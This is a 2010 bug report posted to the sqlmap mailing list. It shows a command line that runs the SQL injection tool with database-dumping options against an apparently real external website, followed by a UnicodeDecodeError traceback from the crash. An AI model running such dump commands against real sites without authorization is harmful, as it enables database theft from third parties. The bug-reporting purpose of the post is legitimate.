[sqlmap-users] error
Brought to you by:
inquisb
From: Marek S. <mar...@gm...> - 2010-08-21 19:50:31
|
[xaka@local sqlmap-dev]$ ./sqlmap.py -u "http://www.asdss.sk/ViewFile.aspx?docid=5441" --batch --threads=10 --dump --dbs --excl-reg "Dynamic content: ([\d]+)" sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 21:46:40 [21:46:40] [INFO] using '/home/xaka/sqlmap-dev/output/www.asdss.sk/session' as session file [21:46:40] [INFO] resuming match ratio '0.9' from session file [21:46:40] [INFO] testing connection to the target url [21:46:43] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible: sqlmap version: 0.9-dev Python version: 2.6.5 Operating system: posix Traceback (most recent call last): File "./sqlmap.py", line 89, in main start() File "/home/xaka/sqlmap-dev/lib/controller/controller.py", line 159, in start if not checkConnection() or not checkString() or not checkRegexp(): File "/home/xaka/sqlmap-dev/lib/controller/checks.py", line 395, in checkConnection page, _ = Request.getPage() File "/home/xaka/sqlmap-dev/lib/request/connect.py", line 259, in getPage responseMsg += getUnicode(responseHeaders) File "/home/xaka/sqlmap-dev/lib/core/common.py", line 1404, in getUnicode return unicode(value) UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 188: ordinal not in range(128) [*] shutting down at: 21:46:43 |